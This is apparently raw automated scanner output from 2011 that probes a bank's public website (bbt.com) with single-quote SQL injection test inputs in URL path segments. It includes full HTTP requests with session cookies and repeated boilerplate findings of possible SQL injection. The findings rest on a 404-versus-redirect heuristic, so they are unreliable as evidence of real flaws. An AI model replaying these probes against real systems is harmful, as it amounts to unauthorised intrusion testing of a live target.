GET /bbt/includes'/chat/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 1
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 13:46:04 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/includes''/chat/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 2
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 13:46:04 GMT location: http://www.bbt.com/bbt/includes%27%27/chat/mtagconfig.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 155 cache-control: private x-powered-by: ASP.NET Content-Length: 159
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/chat/mtagconfig.js">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/includes/chat'/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 1
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 13:46:09 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/includes/chat''/mtagconfig.js HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 2
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 13:46:11 GMT location: http://www.bbt.com/bbt/includes/chat%27%27/mtagconfig.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 155 cache-control: private x-powered-by: ASP.NET Content-Length: 159
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/chat%27%27/mtagconfig.js">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/includes/chat/mtagconfig.js' HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 1
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 13:46:18 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/includes/chat/mtagconfig.js'' HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response 2
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 13:46:18 GMT location: http://www.bbt.com/bbt/includes/chat/mtagconfig.js%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 155 cache-control: private x-powered-by: ASP.NET Content-Length: 159
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/chat/mtagconfig.js%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:11:45 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:11:45 GMT location: http://www.bbt.com/bbt/%27%27/includes/javascript/AC_RunActiveContent.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 171 cache-control: private x-powered-by: ASP.NET Content-Length: 175
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/AC_RunActiveContent.js">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT location: http://www.bbt.com/bbt/includes%27%27/javascript/AC_RunActiveContent.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 170 cache-control: private x-powered-by: ASP.NET Content-Length: 174
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/AC_RunActiveContent.js">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:19 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:12:20 GMT location: http://www.bbt.com/bbt/includes/javascript%27%27/AC_RunActiveContent.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 170 cache-control: private x-powered-by: ASP.NET Content-Length: 174
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/AC_RunActiveContent.js">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:12:40 GMT location: http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 170 cache-control: private x-powered-by: ASP.NET Content-Length: 174
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/AC_RunActiveContent.js%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:11:45 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:11:45 GMT location: http://www.bbt.com/bbt/%27%27/includes/javascript/browserDetect.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 165 cache-control: private x-powered-by: ASP.NET Content-Length: 169
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/browserDetect.js">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:00 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:12:00 GMT location: http://www.bbt.com/bbt/includes%27%27/javascript/browserDetect.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 164 cache-control: private x-powered-by: ASP.NET Content-Length: 168
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/browserDetect.js">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:19 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:12:19 GMT location: http://www.bbt.com/bbt/includes/javascript%27%27/browserDetect.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 164 cache-control: private x-powered-by: ASP.NET Content-Length: 168
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/browserDetect.js">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:12:41 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:12:41 GMT location: http://www.bbt.com/bbt/includes/javascript/browserDetect.js%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 164 cache-control: private x-powered-by: ASP.NET Content-Length: 168
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/browserDetect.js%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:45 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:45 GMT location: http://www.bbt.com/bbt/%27%27/includes/javascript/new_window.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 162 cache-control: private x-powered-by: ASP.NET Content-Length: 166
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/new_window.js">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:50 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:50 GMT location: http://www.bbt.com/bbt/includes%27%27/javascript/new_window.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 161 cache-control: private x-powered-by: ASP.NET Content-Length: 165
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/new_window.js">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:54 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:54 GMT location: http://www.bbt.com/bbt/includes/javascript%27%27/new_window.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 161 cache-control: private x-powered-by: ASP.NET Content-Length: 165
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/new_window.js">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:59 GMT location: http://www.bbt.com/bbt/includes/javascript/new_window.js%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 161 cache-control: private x-powered-by: ASP.NET Content-Length: 165
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/new_window.js%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:52 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:52 GMT location: http://www.bbt.com/bbt/%27%27/includes/javascript/swapimage.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 161 cache-control: private x-powered-by: ASP.NET Content-Length: 165
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/swapimage.js">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:13:56 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:13:56 GMT location: http://www.bbt.com/bbt/includes%27%27/javascript/swapimage.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 160 cache-control: private x-powered-by: ASP.NET Content-Length: 164
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/swapimage.js">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:14:03 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:14:03 GMT location: http://www.bbt.com/bbt/includes/javascript%27%27/swapimage.js p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 160 cache-control: private x-powered-by: ASP.NET Content-Length: 164
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/swapimage.js">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 - Not Found content-type: text/html date: Thu, 03 Feb 2011 14:14:07 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET Content-Length: 15545
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
HTTP/1.1 302 Object moved content-type: text/html date: Thu, 03 Feb 2011 14:14:07 GMT location: http://www.bbt.com/bbt/includes/javascript/swapimage.js%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 160 cache-control: private x-powered-by: ASP.NET Content-Length: 164
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/swapimage.js%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/locator/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:32 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/locator/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:32 GMT location: http://www.bbt.com/bbt/%27%27/locator/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 149 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/locator/default.html">here</a>.</body>
